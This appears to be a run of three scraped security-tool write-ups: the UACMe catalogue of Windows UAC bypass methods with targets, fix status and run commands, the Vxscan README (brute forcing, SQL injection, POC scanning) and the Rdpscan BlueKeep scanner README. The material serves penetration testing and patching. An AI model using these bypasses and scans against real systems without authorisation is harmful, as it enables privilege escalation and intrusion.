CompMgmtLauncher.exe autoelevation removedAuthor: Enigma0x3 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exeComponent(s): Attacker definedImplementation: ucmHijackShellCommandMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS2 (15031) How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removedAuthor: Enigma0x3 Type: Race ConditionMethod: File overwriteTarget(s): %temp%\GUID\dismhost.exeComponent(s): LogProvider.dllImplementation: ucmDiskCleanupRaceConditionWorks from: Windows 10 TH1 (10240)AlwaysNotify compatibleFixed in: Windows 10 RS2 (15031) How: File security permissions alteredAuthor: ExpLife Type: Elevated COM interfaceMethod: IARPUninstallStringLauncherTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmUninstallLauncherMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16199) How: UninstallStringLauncher interface removed from COMAutoApprovalListAuthor: Exploit/Sandworm Type: Whitelisted componentMethod: InfDefaultInstallTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmSandwormMethodWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)Author: Enigma0x3 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmAppPathMethodWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 RS3 (16215) How: Shell API updateAuthor: Leo Davidson derivative, lhc645 Type: Dll HijackMethod: WOW64 loggerTarget(s): \syswow64\{any elevated exe, e.g wusa.exe}Component(s): wow64log.dllImplementation: ucmWow64LoggerMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Enigma0x3 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmSdcltIsolatedCommandMethodWorks from: Windows 10 TH1 (10240)Fixed in: Windows 10 RS4 (17025) How: Shell API / Windows components updateAuthor: xi-tauw Type: Dll HijackMethod: UIPI bypass with uiAccess applicationTarget(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exeComponent(s): duser.dll, osksupport.dllImplementation: ucmUiAccessMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: winscripting.blog Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\fodhelper.exe, \system32\computerdefaults.exeComponent(s): Attacker definedImplementation: ucmMsSettingsDelegateExecuteMethodWorks from: Windows 10 TH1 (10240)Fixed in: unfixed , How: -Author: James Forshaw Type: Shell APIMethod: Environment variables expansionTarget(s): \system32\svchost.exe via \system32\schtasks.exeComponent(s): Attacker definedImplementation: ucmDiskCleanupEnvironmentVariableWorks from: Windows 8.1 (9600)AlwaysNotify compatibleFixed in: unfixed , How: -Author: CIA & James Forshaw Type: ImpersonationMethod: Token ManipulationsTarget(s): Autoelevated applicationsComponent(s): Attacker definedImplementation: ucmTokenModificationWorks from: Windows 7 (7600)AlwaysNotify compatible, see noteFixed in: Windows 10 RS5 (17686) How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check addedAuthor: Thomas Vanhoutte aka SandboxEscaper Type: Race conditionMethod: NTFS reparse point & Dll HijackTarget(s): wusa.exeComponent(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dllImplementation: ucmJunctionMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Ernesto Fernandez, Thomas Vanhoutte Type: Dll HijackMethod: SxS DotLocal, NTFS reparse pointTarget(s): \system32\dccw.exeComponent(s): GdiPlus.dllImplementation: ucmSXSDccwMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Clement Rouault Type: Whitelisted componentMethod: APPINFO command line spoofingTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmHakrilMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Stefan Kanthak Type: Dll HijackMethod: .NET Code ProfilerTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmCorProfilerMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Ruben Boonen Type: COM Handler HijackMethod: Registry key manipulationTarget(s): \system32\mmc.exe, \System32\recdisc.exeComponent(s): Attacker definedImplementation: ucmCOMHandlersMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 19H1 (18362) How: Side effect of Windows changesAuthor: Oddvar Moe Type: Elevated COM interfaceMethod: ICMLuaUtilTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmCMLuaUtilShellExecMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: BreakingMalware and Enigma0x3 Type: Elevated COM interfaceMethod: IFwCplLuaTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmFwCplLuaMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (17134) How: Shell API updateAuthor: Oddvar Moe derivative Type: Elevated COM interfaceMethod: IColorDataProxy, ICMLuaUtilTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmDccwCOMMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: bytecode77 Type: Shell APIMethod: Environment variables expansionTarget(s): Multiple auto-elevated processesComponent(s): Various per targetImplementation: ucmVolatileEnvMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS3 (16299) How: Current user system directory variables ignored during process creationAuthor: bytecode77 Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\slui.exeComponent(s): Attacker definedImplementation: ucmSluiHijackMethodWorks from: Windows 8.1 (9600)Fixed in: unfixed , How: -Author: Anonymous Type: Race ConditionMethod: Registry key manipulationTarget(s): \system32\BitlockerWizardElev.exeComponent(s): Attacker definedImplementation: ucmBitlockerRCMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (>16299) How: Shell API updateAuthor: clavoillotte & 3gstudent Type: COM Handler HijackMethod: Registry key manipulationTarget(s): \system32\mmc.exeComponent(s): Attacker definedImplementation: ucmCOMHandlersMethod2Works from: Windows 7 (7600)Fixed in: Windows 10 19H1 (18362) How: Side effect of Windows changesAuthor: deroko Type: Elevated COM interfaceMethod: ISPPLUAObjectTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmSPPLUAObjectMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS5 (17763) How: ISPPLUAObject interface method changedAuthor: RinN Type: Elevated COM interfaceMethod: ICreateNewLinkTarget(s): \system32\TpmInit.exeComponent(s): WbemComn.dllImplementation: ucmCreateNewLinkMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS1 (14393) How: Side effect of consent.exe COMAutoApprovalList introductionAuthor: Anonymous Type: Elevated COM interfaceMethod: IDateTimeStateWrite, ISPPLUAObjectTarget(s): w32time serviceComponent(s): w32time.dllImplementation: ucmDateTimeStateWriterMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS5 (17763) How: Side effect of ISPPLUAObject interface changeAuthor: bytecode77 derivative Type: Elevated COM interfaceMethod: IAccessibilityCplAdminTarget(s): \system32\rstrui.exeComponent(s): Attacker definedImplementation: ucmAcCplAdminMethodWorks from: Windows 7 (7600)Fixed in: Windows 10 RS4 (17134) How: Shell API updateAuthor: David Wells Type: Whitelisted componentMethod: AipNormalizePath parsing abuseTarget(s): Attacker definedComponent(s): Attacker definedImplementation: ucmDirectoryMockMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Emeric Nasi Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\sdclt.exeComponent(s): Attacker definedImplementation: ucmShellDelegateExecuteCommandMethodWorks from: Windows 10 (14393)Fixed in: unfixed , How: -Author: egre55 Type: Dll HijackMethod: Dll path search abuseTarget(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exeComponent(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dllImplementation: ucmEgre55MethodWorks from: Windows 10 (14393)Fixed in: unfixed , How: -Author: James Forshaw Type: GUI HackMethod: UIPI bypass with token modificationTarget(s): \system32\osk.exe, \system32\msconfig.exeComponent(s): Attacker definedImplementation: ucmTokenModUIAccessMethodWorks from: Windows 7 (7600)Fixed in: unfixed , How: -Author: Hashim Jawad Type: Shell APIMethod: Registry key manipulationTarget(s): \system32\WSReset.exeComponent(s): Attacker definedImplementation: ucmShellDelegateExecuteCommandMethodWorks from: Windows 10 (17134)Fixed in: unfixed , How: -Author: Leo Davidson derivative by Win32/Gapz Type: Dll HijackMethod: IFileOperationTarget(s): \system32\sysprep\sysprep.exeComponent(s): unattend.dllImplementation: ucmStandardAutoElevationWorks from: Windows 7 (7600)Fixed in: Windows 8.1 (9600) How: sysprep.exe hardened LoadFrom manifest elementsNote:Method (6) unavailable in wow64 environment starting from Windows 8;Method (11) (54) implemented only in x86-32 version;Method (13) (19) (30) (38) (50) implemented only in x64 version;Method (14) require process injection, wow64 unsupported, use x64 version of this tool;Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;Method (30) require x64 because it abuses WOW64 subsystem feature;Method (35) AlwaysNotify compatible as there always will be running autoelevated apps or user will have to launch them anyway;Method (38) require internet connection as it executes remote script located at github.com/hfiref0x/Beacon/blob/master/uac/exec.html;Method (55) is not really reliable (as any GUI hacks) and included just for fun.Run examples:akagi32.exe 1akagi64.exe 3akagi32 1 c:\windows\system32\calc.exeakagi64 3 c:\windows\system32\charmap.exeWarningThis tool shows ONLY popular UAC bypass method used by malware, and reimplement some of them in a different way improving original concepts. There are exists different, not yet known to general public methods, be aware of this;Using (5) method will permanently turn off UAC (after reboot), make sure to do this in test environment or don’t forget to re-enable UAC after tool usage;Using (5), (9) methods will permanently compromise security of target keys (UAC Settings key for (5) and IFEO for (9)), if you do tests on your real machine – restore keys security manually after you complete this tool usage;This tool is not intended for AV tests and not tested to work in aggressive AV environment, if you still plan to use it with installed bloatware AV soft – you use it at your own risk;Some AV may flag this tool as HackTool, MSE/WinDefender constantly marks it as malware, nope;If you run this program on real computer remember to remove all program leftovers after usage, for more info about files it drops to system folders see source code;Most of methods created for x64, with no x86-32 support in mind. I don’t see any sense in supporting 32 bit versions of Windows or wow64, however with small tweaks most of them will run under wow64 as well.If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105Windows 10 support and testing policyEOL’ed versions of Windows 10 are not supported and therefore not tested (at moment of writing EOL’ed Windows 10 versions are: TH1 (10240), TH2 (10586));Insider builds are not supported as methods may be fixed there.ProtectionAccount without administrative privileges.Malware usageIt is currently known that UACMe used by Adware/Multiplug (9), by Win32/Dyre (3), by Win32/Empercrypt (10 & 13), by IcedID downloader (35 & 41). We do not take any responsibility for this tool usage in the malicious purposes. It is free, open-source and provided AS-IS for everyone.Other usageCurrently used as "signature" by "THOR APT" scanner (handmade pattern matching fraudware from Germany). We do not take any responsibility for this tool usage in the fraudware;The scamware project called "uacguard" has references to UACMe from their platform. We do not take any responsibility for this tool usage in the scamware. The repository https://github.com/hfiref0x/UACME and it contents are the only genuine source for UACMe code. We have nothing to do with external links to this project, mentions anywhere as well as modifications (forks);In July 2016 so-called "security company" Cymmetria released report about script-kiddie malware bundle called "Patchwork" and false flagged it as APT. They stated it was using "UACME method", which in fact is just slightly and unprofessionally modified injector dll from UACMe v1.9 and was using Carberp/Pitou hybrid method in malware self-implemented way. We do not take any responsibility for UACMe usage in the dubious advertising campaigns from third party "security companies".BuildUACMe comes with full source code, written in C with some parts written in C#;In order to build from source you need Microsoft Visual Studio 2013/2015 U2 and later versions.Instructions Select Platform ToolSet first for project in solution you want to build (Project->Properties->General): v120 for Visual Studio 2013;v140 for Visual Studio 2015;v141 for Visual Studio 2017. For v140 and above set Target Platform Version (Project->Properties->General): If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);If v141 then select 10.0.17134.0 (Note that Windows 10.0.17134 SDK must be installed). Note that Fujinami module built with .NET Framework 3.0 (this is requirement for it work), so .NET Framework 3.0 must be installed if you want to build this module. Can be built with SDK 8.1/10.17134/10.17763. ReferencesWindows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.htmlMalicious Application Compatibility Shims, https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdfJunfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/Beyond good ol’ Run key, series of articles, http://www.hexacorn.com/blogKernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited"Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/Bypassing UAC on Windows 10 using Disk Cleanup, https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/Using IARPUninstallStringLauncher COM interface to bypass UAC, http://www.freebuf.com/articles/system/116611.htmlBypassing UAC using App Paths, https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/"Fileless" UAC Bypass using sdclt.exe, https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/UAC Bypass or story about three escalations, https://habrahabr.ru/company/pm/blog/328008/Exploiting Environment Variables in Scheduled Tasks for UAC Bypass, https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.htmlFirst entry: Welcome and fileless UAC bypass, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/Reading Your Way Around UAC in 3 parts: https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.htmlhttps://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.htmlResearch on CMSTP.exe, https://msitpros.com/?p=3960UAC bypass via elevated .NET applications, https://offsec.provadys.com/UAC-bypass-dotnet.htmlUAC Bypass by Mocking Trusted Directories, https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6eYet another sdclt UAC bypass, http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypassUAC Bypass via SystemPropertiesAdvanced.exe and DLL Hijacking, https://egre55.github.io/system-properties-uac-bypass/Accessing Access Tokens for UIAccess, https://tyranidslair.blogspot.com/2019/02/accessing-access-tokens-for-uiaccess.htmlFileless UAC Bypass in Windows Store Binary, https://www.activecyber.us/1/post/2019/03/windows-uac-bypass.htmlAuthors(c) 2014 – 2019 UACMe ProjectDownload UACME

Link: http://feedproxy.google.com/~r/PentestTools/~3/SVc2u0HEg4k/uacme-defeating-windows-user-account.html

Vxscan – Comprehensive Scanning Tool

Python3 comprehensive scanning tool, mainly used for sensitive file detection (directory scanning and js leak interface), WAF/CDN identification, port scanning, fingerprint/service identification, operating system identification, weak password detection, POC scanning, SQL injection, winding Pass CDN, check the next station.Update2019.6.18Fixed the problem of fingerprint recognition iis website error, modified apps.jsonRemoved some third-party libraries and scripts that are prone to errorsScanning is completed if it flashes, it is because the program first detects dns parsing and ping operation.The first time you use Vxscan, fake_useragent will load the ua list of https://fake-useragent.herokuapp.com/browsers/0.1.11 here, and a load timeout error may occur.RequirementsPython version > 3.6requeststqdmpyfigletfake-useragentbeautifulsoup4geoip2tldextractpython-nmapgeoip2tldextractlxmlpymongovirustotal_pythonapt install libpq-dev nmapwget https://geolite.maxmind.com/download/geoip/database/GeoLite2-City.tar.gzAfter decompressing, put GeoLite2-City.mmdb inside to vxscan/db/GeoLite2-City.mmdbwget https://geolite.maxmind.com/download/geoip/database/GeoLite2-ASN.tar.gzAfter decompressing, put the GeoLite2-ASN.mmdb inside to vxscan/db/GeoLite2-ASN.mmdbpip3 install -r requirements.txtFeaturesGenerate a dictionary list using Cartesian product method, support custom dictionary listRandom UserAgent, XFF, X-Real-IPCustomize 404 page recognition, access random pages and then compare the similarities through difflib to identify custom 302 jumpsWhen scanning the directory, first detect the http port and add multiple http ports of one host to the scan target.Filter invalid Content-Type, invalid status?WAF/CDN detectionUse the socket to send packets to detect common ports and send different payload detection port service fingerprints.Hosts that encounter full port open (portspoof) automatically skipCall wappalyzer.json and WebEye to determine the website fingerprintIt is detected that the CDN or WAF website automatically skipsCall nmap to identify the operating system fingerprintCall weak password detection script based on port open (FTP/SSH/TELNET/Mysql/MSSQL…)Call POC scan based on fingerprint identification or port, or click on the open WEB port of IPAnalyze sensitive asset information (domain name, mailbox, apikey, password, etc.) in the js fileGrab website connections, test SQL injection, LFI, etc.Call some online interfaces to obtain information such as VT, www.yougetsignal.com and other websites, determine the real IP through VT pdns, and query the website by www.yougetsignal.com and api.hackertarget.com.Usagepython3 Vxscan.py -hoptional arguments: -h, –help show this help message and exit -u URL, –url URL Start scanning this url -u xxx.com -i INET, –inet INET cidr eg. or -f FILE, –file FILE read the url from the file -t THREADS, –threads THREADS Set scan thread, default 150 -e EXT, –ext EXT Set scan suffix, -e php,asp -w WORD, –word WORD Read the dict from the file 1. Scan a websitepython3 vxscan.py -u http://www.xxx.com/ 2. Scan a website from a file listpython3 vxscan.py -f hosts.txt3. cidr eg. or vxscan.py -i Set thread 100, combine only php suffix, use custom dictionarypython3 vxscan.py -u http://www.xxx.com -e php -t 100 -w ../dict.txtStructure/├─Vxscan.py main file├─db│ ├─apps.json Web fingerprint information│ ├─apps.txt Web fingerprint information (WEBEYE)│ ├─password.txt password├─report Report directory├─lib │ ├─common.py Determine CDN, port scan, POC scan, etc.│ ├─color.py Terminal color output│ ├─active.py Judge dns parsing and ping ip survival│ ├─save_html.py Generate html report│ ├─waf.py waf rules│ ├─osdetect.py Operating system version identification│ ├─random_header.py random header│ ├─scan_port.py PortScan│ ├─jsparse.py Grab the website js connection, analyze ip address, link, email, etc.│ &#9500 ;─settings.py Setting│ ├─pyh.py Generate html│ ├─wappalyzer.py Fingerprint recognition script│ ├─sql_injection.py Grab the website connection and test the SQL injection script├─script │ ├─Poc.py Poc script│ ├─……├─requirements.txt├─logo.jpg├─error.logWaf/CDN list360360wzwsAnquanbaoArmorBaiduYunjiasuAWS WAFAdNovumAiree CDNArt of Defence HyperGuardArvanCloudBarracuda NGBeluga CDNBinarySECBlockDoSBluedon ISTCacheFly CDNChinaCache CDNCisco ACE XML GatewayCloudFlare CDNCloudfront CDNComodoCompStateDenyALL WAFDenyAllDistil FirewallDoSArrest Internet SecurityF5 BIG-IP APMF5 BIG-IP ASMF5-TrafficShieldFastly CDNFortiWebFortiWeb FirewallGoDaddyGreyWizard FirewallHuaweiCloudWAFHyperGuard FirewallIBM DataPowerISAServerImmunify360Imperva SecureSphereIncapsula CDNJiasuleKONAKeyCDNModSecurityNGENIX CDNNSFOCUSNaxsiNetContinuumNetContinuum WAFNeusoft SEnginxNewdefendPalo Alto FirewallPerimeterX FirewallPowerCDNProfenseQiniu CDNReblaze FirewallSDWAFSafe3SafedogSiteLock TrueShieldSonicWALLSonicWallSophos UTM FirewallStingraySucuriTeros WAFUsp-SecVarnishWallarmWatchGuardWebKnightWest263CDNYundunYunsuoZenEdge Firewallaesecurealiyunazion CDNcloudflare CDNdotDefenderlimelight CDNmaxcdn CDNmod_securityyunsuoOutputThe following is the AWVS scanner test website results[ { “testphp.vulnweb.com": { "WAF": "NoWAF", "Webinfo": { "apps": [ "Nginx", "PHP", "DreamWeaver", "php" ], "title": "Home of Acunetix Art", "server": "nginx/1.4.1", "pdns": [ " : 2019-06-09 02:05:52" ], "reverseip": [ "", "rs202995.rs.hosteurope.de", "testhtml5.vulnweb.com", "testphp.ingensec.ch", "testphp.ingensec.com", "testphp.ingensec.fr", "testphp.vulnweb.com", "vulnweb.com", "www.vulnweb.com" ] }, "Ports": [ "IMAPS:993", "ssh:22", "imap:143", "http:80", "Unknown:8880", "pop:110", "POP3:995", "smtp:25", "Unknown:8443", "SMTPS:465", "DNS:53", "ftp:21" ], "Ipaddr": "", "Address": "德国 ", "Vuln": [ "http://testphp.vulnweb.com | Home of Acunetix Art", "MySQL SQLi:http://testphp.vulnweb.com/search.php?test=query", "MySQL SQLi:http://testphp.vulnweb.com/artists.php?artist=1", "MySQL SQLi:http://testphp.vulnweb.com/listproducts.php?cat=2" ], "URLS": [ { "rsp_code": 200, "rsp_len": 12473, "title": "None", "contype": "xml", "url": "/.idea/workspace.xml" }, { "rsp_code": 200, "rsp_len": 1, "title": "None", "contype": "plain", "url": "/CVS/Root" }, { "rsp_code": 200, "rsp_len": 4732, "title": "search", "contype": "html", "url": "/search.php" }, { "rsp_code": 200, "rsp_len": 1, "title": "None", "contype": "plain", "url": "/CVS/Entries" }, { "rsp_code": 200, "rsp_len": 3265, "title": "Home of WASP Art", "contype": "plain", "url": "/index.bak" }, { "rsp_code": 200, "rsp_len": 143, "title": "None", "contype": "xml", "url": "/.idea/scopes/scope_settings.xml" }, { "rsp_code": 200, "rsp_len": 3265, "title": "Home of WASP Art", "contype": "zip", "url": "/index.zip" }, { "rsp_code": 200, "rsp_len": 275, " title": "None", "contype": "xml", "url": "/.idea/modules.xml" }, { "rsp_code": 200, "rsp_len": 5523, "title": "login page", "contype": "html", "url": "/login.php" }, { "rsp_code": 200, "rsp_len": 278, "title": "Index of /admin/", "contype": "html", "url": "/admin/" }, { "rsp_code": 200, "rsp_len": 224, "title": "None", "contype": "xml", "url": "/crossdomain.xml" }, { "rsp_code": 302, "rsp_len": 14, "title": "None", "contype": "html", "url": "/userinfo.php" }, { "rsp_code": 200, "rsp_len": 6, "title": "None", "contype": "plain", "url": "/.idea/.name" }, { "rsp_code": 200, "rsp_len": 4958, "title": "Home of Acunetix Art", "contype": "html", "url": "/index.php" } ] } }]NoteReference cnnetarmy Srchunter design ideasRefer to the weak password module of brut3k1t:Https://github.com/ex0dus-0x/brut3k1tFingerprint recognition mainly calls Wappalyzer and WebEye:https://github.com/b4ubles/python3-Wappalyzerhttps://github.com/zerokeeper/WebEyePoc referenced:BBscan scanner https://github.com/lijiejie/BBScanPOC-T https://github.com/Xyntax/POC-T/tree/2.0/scriptPerun https://github.com/WyAtu/PerunRefer to the anthx port scan, service judgment:https://raw.githubusercontent.com/AnthraX1/InsightScan/master/scanner.pyInjecting the crawler reference:DSSS https://github.com/stamparm/DSSSJs sensitive information regular extraction reference:https://github.com/nsonaniya2010/SubDomainizerWAF judges the use of waf00f and whatwaf judgment rules:https://github.com/EnableSecurity/wafw00fhttps://github.com/Ekultek/WhatWafDownload Vxscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/0ZDcFApPJl8/vxscan-comprehensive-scanning-tool.html

Rdpscan – A Quick Scanner For The CVE-2019-0708 “BlueKeep” Vulnerability

This is a quick-and-dirty scanner for the CVE-2019-0708 vulnerability in Microsoft Remote Desktop. Right now, there are about 900,000 machines on the public Internet vulnerable to this vulnerability, so many are to expect a worm soon like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems.This is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above.This tool is based entirely on the rdesktop patch from https://github.com/zerosum0x0/CVE-2019-0708.Primary useTo scan a network, run it like the following:rdpscan produces one of 3 results for each address:SAFE – if target has determined bot be patched or at least require CredSSP/NLAVULNERABLE – if the target has been confirmed to be vulnerableUNKNOWN – if the target doesn’t respond or has some protocol failureWhen nothing exists at a target IP address, the older versions pritned the message “UNKNOWN – connection timed out". When scanning large networks, this produces an overload of too much information about systems you don’t care about. Therefore, the new version by default doesn’t produce this information unless you add -v (for verbose) on the command-line.You can increase the speed at which it scans large networks by increasing the number of workers:rdpscan –workers 10000, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter.You can increase the speed even more by using this in conjunction with masscan, described in the second below.Interpreting the resultsThere are three general responses:SAFE – which means the target is probably patched or otherwise not vulnerable to the bug.VULNERABLE: which means we’ve confirmed the target is vulnerable to this bug, and that when the worm hits, will likely get infected.UNKNOWN: means we can’t confirm either way, usually because the target doesn’t respond or isn’t running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we’ll get a lot of these. Finally, protocol errors are responsble for a lot. While the three main responses are SAFE, VULNERABLE, and UNKNOWN, they contain additional text explaining the diagnosis. This section describes the various strings you’ll see.SAFEThere are three main reaons we think a target is safe:SAFE – Target appears patched This happens when the target doesn’t respond to the triggering request. This means it’s a Windows system that’s been patched, or a system that wasn’t vulnerable to begin with, like Windows 10 or Unix.SAFE – CredSSP/NLA required This means that the target first requires Network Level Authentication before the RDP connection can be established. The tool cannot pass this point, without leigitimate credentials, so cannot determine whether the target has been patched. However, hackers can’t continue past this point to exploit vulnerable systems, either, so you are likely "safe". However, when exploits appear, insiders with valid usernames/passwords will be able to exploit the system if it’s un-patched.SAFE – not RDP This means the system is not RDP, but has some other service that happens to use this same port, and produces a response that’s clearly not RDP. Common examples are HTTP and SSH. Note however that instead of an identifiable protocol, a server may respond with a RST or FIN packet. These are identified as UNKNOWN instead of SAFE/VULNERABLEThis means we’ve confirmed the system is vulnerable to the bug.VULNERABLE – got appid There is only one response when the system is vulnerable, this one.UNKNOWNThere are a zillion variations for unknownUNKNOWN – no connection – timeout This is by far the most common response, and happens when the target IP address makes no response whatsoever. In fact, it’s so common that when scanning large ranges of addresses, it’s usually ommited. You have to add the -v (verbose) flag in order to enable it.UNKNOWN – no connection – refused (RST) This is by far the second most common response, and happens when the target exists and responds to network traffic, but isn’t running RDP, so refuses the connection with a TCP RST packet.UNKNOWN – RDP protocol error – receive timeout This is the third most common response, and happens when we’ve successfully established an RDP connection, but then the server stops responding to us. This is due to network errors and when the target system is overloaded for some reason. It could also be network errors on this end, such as when you are behind a NAT and overloading it with too many connections.UNKNOWN – no connection – connection closed This means we’ve established a connection (TCP SYN-ACK), but then the connection is immediately closed (with a RST or FIN). There are many reasons this happen, which we cannot distinguish: It’s running RDP, but for some reason closes the connection, possibly because it’s out-of-resources.It’s not RDP, and doesn’t like the RDP request we send it, so instad of sending us a nice error message (which would trigger SAFE – not RDP), it abruptly closes the connection.Some intervening device, like an IPS, firewall, or NAT closed the connection because it identified this as hostile, or ran out of resources.Some other reason I haven’t identified, there’s a lot of weird stuff happening when I scan the Internet.UNKNOWN – no connection – host unreachable (ICMP error) The remote network reports the host cannot be reached or is not running. Try again later if you think that host should be alive.UNKNOWN – no connection – network unreachable (ICMP error) There is a (transient) network error on the far end, try again later if you believe that network should be running.UNKNOWN – RDP protocol error This means some corruption happened in the RDP protocol, either because the remote side implents it wrong (not a Windows system), because it’s handling a transient network error badly, or something else.UNKNOWN – SSL protocol error Since Windows Vista, RDP uses the STARTTLS protocol to run over SSL. This layer has it’s own problems like above, which includes handling underlying network errors badly, or trying to communicate with systems that have some sort of incompatibility. If you get a very long error message here (like SSL3_GET_RECORD:wrong version), it’s because the other side has a bug in SSL, or your own SSL library that you are using has a bug.Using with masscanThis rdpscan tool is fairly slow, only scanning a few hundred targets per second. You can instead use masscan to speed things up. The masscan tool is roughly 1000 times faster, but only gives limited information on the target.The steps are:First scan the address ranges with masscan to quickly find hosts that respond on port 3389 (or whatever port you use).Second feed the output of masscan into rdpscan, so it only has to scan targets we know are active.The simple way to run this is just to combine them on the command-line:masscan -p3389 | rdpscan –file -The way I do it is in two steps:masscan -p3389 > ips.txtrdpscan –file ips.txt –workers 10000 >results.txtBuildingThe difficult part is getting the OpenSSL libraries installed, and not conflicting with other versions on the system. Some examples for versions of Linux I’ve tested on are the following, but they keep changing package names from one distribution to the next. Also, there are many options for an OpenSSL-compatible API, such as BoringSSL and LibreSSL.$ sudo apt install libssl-dev$ sudo yum install openssl-develOnce you’ve solved that problem, you just compile all the .c files together like this:$ gcc *.c -lssl -lcrypto -o rdpscanI’ve put a Makefile in the directory that does this, so you can likely do just:$ makeThe code is written in C, so needs a C compiler installed, such as doing the following:$ sudo apt install build-essentialCommon build errorsThis section describes the more obvious build errors.ssl.h:24:25: fatal error: openssl/rc4.h: No such file or directoryThis means you either don’t have the OpensSSL headers installed, or they aren’t in a path somewhere. Remember that even if you have OpenSSL binaries installed, this doesn’t mean you’ve got the development stuff installed. You need both the headers and libraries installed.To install these things on Debian, do:$ sudo apt install libssl-devTo fix the path issue, add a compilation flag -I/usr/local/include, or something similar.An example linker problem is the following:Undefined symbols for architecture x86_64:"_OPENSSL_init_ssl", referenced from: _tcp_tls_connect in tcp-fac73c.o"_RSA_get0_key", referenced from: _rdssl_rkey_get_exp_mod in ssl-d5fdf5.o"_SSL_CTX_set_options", referenced from: _tcp_tls_connect in tcp-fac73c.o"_X509_get_X509_PUBKEY", referenced from: _rdssl_cert_to_rkey in ssl-d5fdf5.oI get this on macOS because there’s multiple versions of OpenSSL. I fix this by hard-coding the paths:$ gcc *.c -lssl -lcrypto -I/usr/local/include -L/usr/local/lib -o rdpscanAccording to comments by others, the following command-line might work on macOS if you’ve used Homebrew to install things. I still get the linking errors above, though, because I’ve installed other OpenSSL components that are conflicting.gcc $(brew –prefix)/opt/openssl/lib/libssl.a $(brew –prefix)/opt/openssl/lib/libcrypto.a -o rdpscan *.cRunningThe section above gives quickstart tips for running the program. This section gives more in-depth help.To scan a single target, just pass the address of the target:./rdpscan can pass in IPv6 addresses and DNS names. You can pass in multiple targets. An example of this would be:./rdpscan exchange.example.com 2001:0db8:85a3::1You can also scan ranges of addresses, using either begin-end IPv4 addresses, or IPv4 CIDR spec. IPv6 ranges aren’t supported because they are so big../rdpscan default, it scans only 100 targets at a time. You can increase this number with the –workers parameter. However, no matter how high you set this parameter, in practice you’ll get a max of around 500 to 1500 workers running at once, depending upon your system../rdpscan –workers 1000 